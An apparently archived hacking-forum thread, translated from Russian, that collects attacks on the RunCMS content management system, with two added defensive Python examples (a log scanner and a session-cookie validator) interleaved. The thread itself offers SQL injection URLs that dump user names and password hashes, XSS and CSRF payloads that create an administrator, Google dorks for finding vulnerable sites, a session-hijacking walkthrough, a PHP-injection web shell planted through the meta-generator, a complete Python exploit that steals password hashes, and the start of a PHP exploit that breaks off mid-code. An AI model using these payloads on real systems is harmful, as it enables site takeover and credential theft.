View Full Version : [ RunCMS Vulnerability Overview ]
Solide Snake
20.01.2008, 04:52
RunCMS Vulnerability Overview
Vendor site: www.runcms.org (http://www.runcms.org/)
Current version: 1.6.1
Exploits
Target: RunCMS <= 1.2
Impact: Arbitrary command execution
RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit (http://milw0rm.com/exploits/1485)
Target: RunCms 1.5.2 and earlier versions
Impact: SQL injection
RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit (http://milw0rm.com/exploits/3850)
Target: RunCMS <= 1.6
Impact: Arbitrary command execution
RunCMS <= 1.6 Local File Inclusion Vulnerability (http://milw0rm.com/exploits/4656)
Target: RunCMS 1.6 and earlier versions
Impact: Arbitrary command execution
RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit (http://milw0rm.com/exploits/4658)
Target: RunCMS 1.6
Impact: SQL injection
RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit (http://milw0rm.com/exploits/4787)
Target: RunCMS 1.6
Impact: SQL injection
RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion) (http://milw0rm.com/exploits/4792)
Target: RunCMS Newbb_plus 0.92 and earlier versions
Impact: SQL injection
RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit (http://milw0rm.com/exploits/4845)
1. Multiple Blind SQL Injection
Attacker can inject SQL code in modules:
http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION
Example:
This query will return link to download file:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0
This query will return error:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0
2. Stored XSS
Vulnerability found in script modules/news/submit.php in post parameter name "subject"
Example:
POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0
subject=<script>alert("DSecRG_XSS")</script>
3. Linked XSS vulnerability found in modules/news/index.php, attacker can inject XSS in URL string:
Example:
http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script>
4. These pages can be overwritten by PHP injection:
runcms_1.6\modules\sections\cache\intro.php
runcms_1.6\modules\mylinks\cache\disclaimer.php
runcms_1.6\modules\mydownloads\cache\disclaimer.php
runcms_1.6\modules\newbb_plus\cache\disclaimer.php
runcms_1.6\modules\system\cache\disclaimer.php
runcms_1.6\modules\system\cache\footer.php
runcms_1.6\modules\system\cache\header.php
runcms_1.6\modules\system\cache\maintenance.php
V. 1.3a5 XSS
http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]
RUNCMS 1.5.1 SQL Injection
http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
//milw0rm.com
Found a blind SQL injection in runcms and started checking whether it was already known; it turned out the injection had been found before me, but it isn't on antichat, so I'm posting it. The vulnerability is in the "bid" parameter of the script "modules/banners/click.php".
Example:
http://www.runcms.de/modules/banners/click.php?op=click&bid=3%20and%20substring(version(),1,1)=4
1) RunCMS MyAnnonces SQL Injection(cid)
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAIL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "modules MyAnnonces index php pa view"
#
################################################################
EXAMPLE
XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]
EXPLOIT :
for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
2) RunCMS 1.6.1 Multiple XSS and XSRF
###################################################################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties by NBBN
###################################################################
1) Create Webmaster (admin) XSRF Vulnerability
<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">
<input type="hidden" name="uname" value="Attacker">
<input type="hidden" name="name" value="Attacker">
<input type="hidden" name="email" value="attack@attack.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="user_avatar" value="blank.gif">
<input type="hidden" name="theme" value="helloween">
<input type="hidden" name="timezone_offset" value="0">
<input type="hidden" name="language" value="deutsch">
<input type="hidden" name="user_icq" value="">
<input type="hidden" name="user_aim" value="">
<input type="hidden" name="user_msnm" value="">
<input type="hidden" name="user_from" value="">
<input type="hidden" name="user_occ" value="">
<input type="hidden" name="user_intrest" value="">
<input type="hidden" name="user_birth%5b2%5D" value="">
<input type="hidden" name="user_birth%5B1%5D" value="">
<input type="hidden" name="user_birth%5BO%5D" value="">
<input type="hidden" name="user_sig" value="">
<input type="hidden" name="umode" value="flat">
<input type="hidden" name="uorder" value="1">
<input type="hidden" name="bio" value="">
<input type="hidden" name="rank" value="7">
<input type="hidden" name="pass" value="Password">
<input type="hidden" name="pass2" value="Password">
<input type="hidden" name="fct" value="users">
<input type="hidden" name="op" value="addUser">
<input type="hidden" name="submit" value="%DCbernehmen">
Also with XSRF an attacker can update the profile of all users. He can change
the password etc...
2) Cross-Site Scripting (an attacker can only attack an admin)
<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">
<input type="text" class="text" name="rank_title" size="30" maxlength="50"
value="<marquee>Cross-Site Scritping :-("/>
<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body>
RUNCMS 1.6.1
Adding a comment
-----------------------------
Incorrect BB Code handling => Active XSS
Example:
[*color]</textarea>[XSS][/*color]
Component Partner Sites 1.03 SQL Injection
(Admin priv)
Exploit:
modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1
Component Web Links 1.02 SQL Injection
(Admin priv)
Exploit:
modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1
Hashing algorithm
$pass = sha1($username.$pass);
© ZAMUT
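An added example (not part of this thread and not RunCMS code): every probe listed in this post travels in the query string, so a defender can spot them in ordinary web-server access logs. The script below parses Apache combined-format lines, URL-decodes the request target twice (double encoding is a common evasion), folds the `/**/` comment trick from the MyAnnonces payloads into whitespace, and tags each line with the signatures it matches: the boolean-blind `and 1=0` pair, `union select`, the `substring(version(),1,1)` fingerprint and a `<script>` tag. The log lines are constructed for the example and use documentation IP ranges; the signature set is my own, not a RunCMS or vendor rule.

```python
"""Tag web-server access-log lines that carry the RunCMS probe patterns seen above.

Added example; the log lines are constructed, not taken from any real server.
"""
import re
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Each signature is applied to the decoded, comment-folded request target.
SIGNATURES = {
    "boolean_blind": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "version_probe": re.compile(r"substring\s*\(\s*version\s*\(\s*\)", re.I),
    "script_tag": re.compile(r"<\s*script\b", re.I),
}

# Constructed sample: the probes from the thread mixed with one benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jan/2008:04:52:01 +0300] "GET /modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [20/Jan/2008:04:52:02 +0300] "GET /modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,3 HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
198.51.100.9 - - [20/Jan/2008:04:53:10 +0300] "GET /modules/news/index.php/%22%3E%3Cscript%3Ealert(%27x%27)%3C/script%3E HTTP/1.0" 200 3000 "-" "Mozilla/4.0"
192.0.2.7 - - [20/Jan/2008:04:54:00 +0300] "GET /modules/mydownloads/visit.php?lid=2 HTTP/1.0" 302 0 "-" "Mozilla/4.0"
192.0.2.7 - - [20/Jan/2008:04:54:05 +0300] "GET /modules/banners/click.php?op=click&bid=3%20and%20substring(version(),1,1)=4 HTTP/1.0" 200 120 "-" "Mozilla/4.0"
192.0.2.7 - - [20/Jan/2008:04:54:09 +0300] "GET /modules/MyAnnonces/index.php?pa=view&cid=-1/**/union/**/select/**/0,1 HTTP/1.0" 200 900 "-" "Mozilla/4.0"
"""


def normalise_target(target):
    """URL-decode twice (to undo double encoding) and fold /**/ into spaces."""
    decoded = target
    for _ in range(2):
        decoded = unquote_plus(decoded)
    return decoded.replace("/**/", " ")


def scan_log(text):
    """Return one dict per matching line: source ip, status, decoded target, signatures hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = normalise_target(m.group("target"))
        tags = [name for name, rx in SIGNATURES.items() if rx.search(target)]
        if tags:
            hits.append({"ip": m.group("ip"), "status": m.group("status"),
                         "target": target, "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["tags"], hit["target"])
```

Feed it a real access log via `scan_log(open(path).read())`; the `status` field is worth keeping in the output, because for a blind probe the attacker is reading the difference between a 200 and an error page, so a pair of near-identical requests with differing statuses from one IP is itself the signal.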
•†•SyTiNeR•†•
21.03.2008, 09:01
RunCMS Module section (artid) Remote SQL Injection Vulnerability
Cr@zy_King
crazy_kinq@hotmail.co.uk / hackshow.us
Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91
Runcms Module Section (artid) Remote Sql Inj. Vuln.
Example :
- modules/sections/index.php?op=viewarticle&artid=Sql
- Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
Cr@ Says : Memati won't die in Kurtlar Vadisi, nobody get excited :D
Alemin_Krali Says : Totally agree (whatever that has to do with anything, a.q)
Good.
# milw0rm.com [2008-03-20]
SQL Injection
Vulnerable: Module Photo 3.02
Exploit:
admin
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
pass
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Dork:
allinurl: "modules/photo/viewcat.php?id"
inurl:photo "powered by runcms"
© S@BUN
RunCMS Module nGuestBook 1.01 Active XSS
Add message => Message => [XSS]
dork: inurl:/modules/nguestbook/
SQL Injection
Vulnerable: Module Photo 4.00
Vuln code:
.....
include_once(PHOTO_PATH."/class/bama_cat.php");
$id = $HTTP_GET_VARS['id'];
if (isset($HTTP_GET_VARS['cid'])) {
.....
Exploit:
http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+uid=1
ZAMUT (c)
RunCMS Module MyArticles 0.0.4-0.5 sql-inj
SQL injection in the topic_id parameter; GET is filtered, so the data must be sent via POST
http://mobilefree.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users
© H00k
~!DoK_tOR!~
27.04.2008, 05:33
RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability
SQL Injection
http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=[SQL]
-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users
milw0rm.com
RunCMS Module HotNews 2.00 (tid) Remote SQL Injection Vulnerability
Vuln code:
.....
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
if ($HTTP_GET_VARS['page']) {
$page = $HTTP_GET_VARS['page'];
.....
Exploit:
/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users
Example:
http://www.segacfecgc.info/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users
dork: /modules/HotNews/
ZAMUT(c)
A method for when the SQL injection went through but there is no way to brute-force the hash!
1. Register an account on the site (the target)
2. In my case the injection I ran looked like this
modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,hash,4,5,uname,7,8,9,10+from+runcms_session+where+uid=3
This way we dump the admin's session hash (don't forget the id)!
It returned something like eb5cafcd8afa7edf125edfa35c55c73e425bd1d0
3. Log in with the registered account and look at our cookies
They look roughly like this:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2220001%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%
our id = 20001
and the session = e2ef357450c7c647fa5c813808d1500273407483
4. Change it to the admin's id (in my case id = 00003) and the session = eb5cafcd8afa7edf125edfa35c55c73e425bd1d0
We get the following:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2200003%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%3B%7D
I changed the cookies via a Firefox plugin: ticked the box next to Session cookies and refreshed the page.
And we're in the admin panel.
Thanks for your attention!
RunCMS Module Reviews 2.00 (lid) Remote SQL Injection Vulnerability
Vuln code:
.....
global $xoopsConfig, $db, $HTTP_POST_VARS, $myts, $eh;
$lid = $HTTP_POST_VARS['lid'];
$title = $HTTP_POST_VARS['title'];
.....
Exploit:
/modules/myReviews/reviewbook.php?lid=-999991+union+select+pass+from+runcms_users
ZAMUT (c)
RunCMS Module Arcade 1.28 (gid) Remote SQL Injection Vulnerability
Vuln code:
global $HTTP_POST_VARS, $HTTP_GET_VARS, $myts;
$commit = isset($HTTP_POST_VARS['commit']) ? $HTTP_POST_VARS['commit'] : $HTTP_GET_VARS['commit'];
$gid = isset($HTTP_POST_VARS['gid']) ? $HTTP_POST_VARS['gid'] : $HTTP_GET_VARS['gid'];
Exploit:
/index.php?act=play_game&gid=-999999+union+select+1,2,3,4,pass,6,7,8,9,10,11,12,13,14+from+runcms_users
ZAMUT(c)
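An added example (not from this thread and not RunCMS code) for the session-cookie post above. The cookie shown there is a PHP `serialize()`d array of three fields: the uid as a zero-padded digit string, a 40-hex session hash, and a timestamp. The code below parses that format with a small reader (arrays, ints, strings, bools, null only), validates the shape strictly, and then does the server-side check a session store should do: look the session up by hash and refuse the cookie when the stored owner is not the uid the cookie claims. That rejects the intermediate cookie the poster shows (uid rewritten, hash still the 20001 account's). It cannot help once the admin's hash itself has been read out of runcms_session, which is why the injection, not the cookie check, is the thing to fix; the session table and the second cookie are constructed for the example.

```python
"""Parse the PHP-serialised RunCMS session cookie quoted above and validate it server-side.

Added example, not RunCMS code. The session table is constructed; the cookie
layout (uid string, 40-hex session hash, timestamp) is the one shown in the post.
"""
import re
from urllib.parse import unquote


def php_unserialize(data):
    """Minimal reader for PHP serialize() output: N, b, i, s and a (no objects, no floats)."""
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos]
        if t == "N":                       # N;
            pos += 2
            return None
        if t in "ib":                      # i:123;  b:1;
            end = data.index(";", pos)
            value = int(data[pos + 2:end])
            pos = end + 1
            return bool(value) if t == "b" else value
        if t == "s":                       # s:5:"20001";  PHP counts bytes; ASCII cookies make chars == bytes
            colon = data.index(":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2              # skip :"
            value = data[start:start + length]
            if data[start + length:start + length + 2] != '";':
                raise ValueError("string length does not match payload")
            pos = start + length + 2
            return value
        if t == "a":                       # a:3:{key;value;...}
            colon = data.index(":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2                # skip :{
            result = {}
            for _ in range(count):
                key = parse()
                result[key] = parse()
            if data[pos] != "}":
                raise ValueError("unterminated array")
            pos += 1
            return result
        raise ValueError("unsupported type %r" % t)

    value = parse()
    if pos != len(data):
        raise ValueError("trailing data after serialised value")
    return value


SESSION_HASH_RE = re.compile(r"^[0-9a-f]{40}$")


def parse_session_cookie(raw_cookie):
    """Return (uid, session_hash, issued_at) or raise ValueError if the shape is wrong."""
    arr = php_unserialize(unquote(raw_cookie))
    if not isinstance(arr, dict) or sorted(arr) != [0, 1, 2]:
        raise ValueError("cookie is not a 3-element list")
    uid, session_hash, issued_at = arr[0], arr[1], arr[2]
    if not (isinstance(uid, str) and uid.isdigit()):
        raise ValueError("uid must be a digit string")
    if not (isinstance(session_hash, str) and SESSION_HASH_RE.match(session_hash)):
        raise ValueError("session hash must be 40 hex chars")
    if not isinstance(issued_at, int):
        raise ValueError("timestamp must be an int")
    return int(uid), session_hash, issued_at


# Constructed server-side session store: hash -> uid that logged in with it.
SESSION_TABLE = {
    "e2ef357450c7c647fa5c813808d1500273407483": 20001,
    "eb5cafcd8afa7edf125edfa35c55c73e425bd1d0": 3,
}


def resolve_session(raw_cookie, table=SESSION_TABLE):
    """Authenticate a cookie: look the session up by hash, then insist the stored
    owner equals the uid the cookie claims. Returns the uid, or None."""
    try:
        uid, session_hash, _ = parse_session_cookie(raw_cookie)
    except (ValueError, IndexError):
        return None
    owner = table.get(session_hash)
    if owner is None or owner != uid:
        return None
    return uid


# The poster's own cookie, and the same cookie with only the uid field rewritten.
COOKIE_OWN = ("a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2220001%22%3Bi%3A1%3Bs%3A40%3A"
              "%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%3B%7D")
COOKIE_UID_ONLY = COOKIE_OWN.replace("%2220001%22", "%2200003%22")

if __name__ == "__main__":
    print(parse_session_cookie(COOKIE_OWN))
    print(resolve_session(COOKIE_OWN), resolve_session(COOKIE_UID_ONLY))
```

The strict shape check matters on its own: the application's `unserialize()` of a cookie accepts any PHP type the attacker cares to encode, so rejecting anything that is not exactly three scalars of the expected types closes a class of problems before the session lookup even runs.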
•†•SyTiNeR•†•
09.05.2008, 10:09
RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit
#!/usr/bin/python
"""
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
# | | | \ | |/ \ \___| | /_____/ | || | #
# |___|___| /\__| /______ /\___ >__| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This is a public Exploit #
#=================================================================================================#
# Runcms <= 1.6.1 #
# Sql Injection Vulnerability #
# Benchmark Method #
#=================================================================================================#
# .-= In memory of our friend rGod =-. #
#====================================#===========#====================================#===========#
# Server Configuration Requirements # # Some Information # #
#====================================# #====================================# #
# # #
# magic_quotes_gpc = 0 # Vendor: runcms.org #
# # Author: The:Paradox #
#================================================# Severity: Moderately Critical #
# # #
# Uff... I have to find something to put here... # Proud To Be Italian. #
# # #
#====================================#===========#================================================#
# Proof Of Concept / Bug Explanation # #
#====================================# #
# #
# This time i'm really too lazy to write a long PoC. #
# $msg_image (but also $msg_attachment) is unproperly checked when calling store() #
# function (modules/messages/class/pm.class.php) #
# Sql injection in insert syntax (whatever I am not using blind attack). Prefix knowledge needed. #
# #
#=================================================================================================#
[modules/messages/class/pm.class.php]
64. function store() {
65. global $db, $upload;
66.
67. if ( !$this->isCleaned() ) {
68. if ( !$this->cleanVars() ) {
69. return false;
70. }
71. }
72.
73. foreach ( $this->cleanVars as $k=>$v ) {
74. $$k = $v;
75. }
76.
77. if ( empty($msg_id) ) {
78.
79. $msg_id = $db->genId($db->prefix('private_msgs').'_msg_id_seq');
80.
81. $sql = "
82. INSERT INTO ".$db->prefix("private_msgs")." SET
83. msg_id=".intval($msg_id).",
84. msg_image='$msg_image',
85. msg_attachment='$msg_attachment',
86. subject='$subject',
87. from_userid=".intval($from_userid).",
88. to_userid=".intval($to_userid).",
89. msg_time=".time().",
90. msg_text='$msg_text',
91. read_msg=0,
92. type='".$type."',
93. allow_html=".intval($allow_html).",
94. allow_smileys=".intval($allow_smileys).",
95. allow_bbcode=".intval($allow_bbcode).",
96. msg_replay=".intval($msg_replay)."";
97. }
98.
99. if ( !$result = $db->query($sql) ) {
100. $this->errors[] = _NOTUPDATED;
101. return false;
102. }
103.
104. return true;
105. }
#=================================================================================================#
# There are other vulnerabilities in this CMS. Find them by yourself. #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds. #
#=================================================================================================#
# Python Exploit Starts #
#=================================================================================================#
"""
import urllib, urllib2
from sys import argv, exit
main = """
#================================================================#
# Runcms <= 1.6.1 #
# Sql Injection Vulnerability #
# Discovered By The:Paradox #
# #
# rGod is still alive in our hearts #
# #
# Usage: #
# ./homerun [Target+path] [TargetUid] [ValidUserCookie] #
# ./homerun --help (to print an example) #
#================================================================#
"""
prefix = "runcms_"
if len(argv)>=2 and argv[1] == "--help":
    print "\nuser@linux:~/Desktop$ ./homerun http://localhost/web/runcms/ 1 rc_sess=a%3A3%3A%7Bi%3A0%3Bi%3A3%3Bi%3A1%3Bs%3A40%3A%228b394462d67198707aea362098001610d35687ff%22%3Bi%3A2%3Bi%3A1212933002%3B%7D;\n\n" + main + "\n\n[.] Exploit Starting.\n[+] Sending HTTP Request...\n[+] A message with username and password of user with id 1 has been sent to user with id 3.\n -= The:Paradox =-"
else: print main
if len(argv)<=3: exit()
else: print "[.] Exploit Starting."
host = argv[1]
tuid = argv[2]
cookie = argv[3]
try: uid = cookie.split("a%3A3%3A%7Bi%3A0%3Bi%3A")[1].split("%3Bi%3A1%3Bs%3A40%3A%")[0]
except: exit("[-] Invalid cookie")
sql = "icon12.gif', msg_attachment='', subject='Master, all was done.', from_userid=" + str(uid) + ", to_userid=" + str(uid) + ", msg_time=0, msg_text=concat('Master, password hash for ',(select uname from " + prefix + "users where uid=" + tuid + "),' is ',(select pass from " + prefix + "users where uid=" + tuid + ")), read_msg=0, type='1', allow_html=0, allow_smileys=1, allow_bbcode=1, msg_replay=0/*"
print "[+] Sending HTTP Request..."
values = {'subject' : 'Master attack failed.',
'message' : 'Probably mq = 1 or system patched.',
'allow_html' : 0,
'allow_smileys' : 1,
'allow_bbcode' : 0,
'msg_replay' : 1,
'submit' : '1',
'msg_image' : sql,
'to_userid' : uid }
headers = {'Cookie' : cookie,
'Content-Type' : 'application/x-www-form-urlencoded'}
req = urllib2.Request(host + "/modules/messages/pmlite.php", urllib.urlencode(values), headers)
response = urllib2.urlopen(req)
if response.read().find('Your message has been posted.') != -1: print "[+] A message with username and password of user with id " + tuid + " has been sent to user with id " + uid + ".\n -= The:Paradox =-"
else: print "[-] Unable to send message"
# milw0rm.com [2008-05-08]
In the admin panel
File reader (all versions).
DB config
http://localhost/runcms/class/debug/highlight.php?file=../../mainfile.php
you can trojan every page of the CMS:
Here we edit the header or footer however we need; I inserted an iframe :)
http://localhost/runcms/modules/system/admin.php?fct=meta-generator
And no idea what they're good for, but let them be here. SQL-inj.
/modules/system/admin.php?fct=smilies&op=SmilesEdit&id=-1+union+select+1,pass,3,4+from+runcms_users
/modules/system/admin.php?fct=userrank&op=RankForumEdit&rank_id=-1+union+select+1,pass,3,4,5,6+from+runcms_users
ZAMUT (c)
Uploading a shell in RunCMS
via Meta-Generator
Vulnerable piece of code:
.......
$content .= "\$meta['follow'] = \"".$_POST["Xfollow"]."\";\n";
$content .= "\$meta['pragma'] = \"".$_POST["Xpragma"]."\";\n";
$content .= "\$meta['icon'] = \"".$_POST["Xicon"]."\";\n";
.......
write_file("meta", $content, "w");
Go to:
http://localhost/runc/modules/system/admin.php?fct=meta-generator
the Bookmark Icon field looks like:
../../favicon.ico
change it to:
../../favicon.ico";echo `$_REQUEST[c]`;#
now the file with this option (\modules\system\cache\meta.php) looks like this:
.........
$meta['rating'] = "general";
$meta['p3p'] = "";
$meta['index'] = "index";
$meta['follow'] = "follow";
$meta['pragma'] = "";
$meta['icon'] = "../../favicon.ico";echo `$_REQUEST[c]`;#";
.........
I.e. a classic PHP injection; as we can see, now everything depends on our imagination :)
use it like this:
http://localhost/runc/modules/system/admin.php?fct=meta-generator&c=dir
IMHO the method is completely stealthy (when we use POST) ;)
Also, as an option, you can include a smiley/avatar with PHP code added to it (after upload it will be located at ../../images/smilies/smile.gif )
ZAMUT (c)
Solide Snake
26.06.2008, 18:57
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure exploit
<?php
print_r('
--------------------------------------------------------------------------
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials
disclosure exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org
dork: "Runcms Copyright" "2002 - 2007" +"page created"
---------------------------------------------------------------------------
');
/*
software site: http://www.runcms.org/modules/news/
vulnerable code in /class/debug/debug_show.php:
<?php
...
include_once("../../mainfile.php");
include_once("../../header.php");
switch($_POST['debug_show']) {
case "show_files":
show_files($_POST['loaded_files']);
break;
case "show_queries":
show_queries($_POST['executed_queries'], $_POST['sorted']);
break;
}
include_once("../../footer.php");
?>
no authentication is performed to run show_files() and show_queries()
functions, look at this now in /class/debug/debug.php:
...
function show_queries($executed_queries, $sorted=0)
{
global $db;
$executed_queries = unserialize(urldecode($executed_queries));
if ($sorted == 1)
{
sort($executed_queries);
$is_sorted = _DBG_SORTEDR;
}
else
{
array_reverse($executed_queries);
$is_sorted = _DBG_NSORTEDR;
}
OpenTable();
$fulldebug = "
<h4>($is_sorted) "._DBG_QEXECED.": ".count($executed_queries)."</h4>
<table width='100%' cellpadding='3' cellspacing='1'>";
$size = count($executed_queries);
for ($i=0; $i<$size; $i++)
{
$stime = get_micro_time();
$query = $db->query("EXPLAIN ".$executed_queries[$i]."");
$querytime = (get_micro_time() - $stime);
$totaltime += $querytime;
$fulldebug .= "<tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_QUERY.": ".($i+1)."</b></td>
<td colspan='7' class='bg3'>$executed_queries[$i]</td>
</tr><tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TIME.":</b></td>
<td colspan='7' class='bg3'>".round($querytime, 4)." "._DBG_SECONDS."</td>
</tr><tr>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TABLE.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_TYPE.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_POSSKEYS.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEY.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEYLEN.":</b></td>
<td nowrap='nowrap' class='bg2'><b>ref:</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_ROWS.":</b></td>
<td nowrap='nowrap' class='bg2'><b>"._DBG_EXTRA.":</b></td>
</tr>";
while ($result = $db->fetch_array($query))
{
$fulldebug .= " <tr>
<td class='bg3' nowrap='nowrap' {$result['table']} </td>
<td class='bg3' nowrap='nowrap' {$result['type']} </td>
<td class='bg3'>{$result['possible_keys']} </td>
<td class='bg3' nowrap='nowrap' {$result['key']} </td>
<td class='bg3' nowrap='nowrap' {$result['key_len']} </td>
<td class='bg3' nowrap='nowrap' {$result['ref']} </td>
<td class='bg3' nowrap='nowrap' {$result['rows']} </td>
<td class='bg3'>{$result['Extra']} </td>
</tr>";
}
$fulldebug .= "<tr>
<td colspan='8' class='bg1'>"._DBG_CUMULATED.":".round($totaltime, 4)." "._DBG_SECONDS."<hr noshade></td>
</tr>";
}
$fulldebug .= "</table>";
echo $fulldebug;
CloseTable();
}
...
we have a nice kind of sql injection here!
also show_files function can be used to check the existence of certain files
and retrieve the filesize or if it has been modified and so on...
*/
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to runcms
Options:
-p[port]: specify a port other than 80
-P[ip:port]: "" a proxy
-T[prefix] "" a table prefix (default: runcms)
Example:
php '.$argv[0].' localhost /runcms/ -P1.1.1.1:80
php '.$argv[0].' localhost / -Trcms -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function send($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
$parts[1]=(int)$parts[1];
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
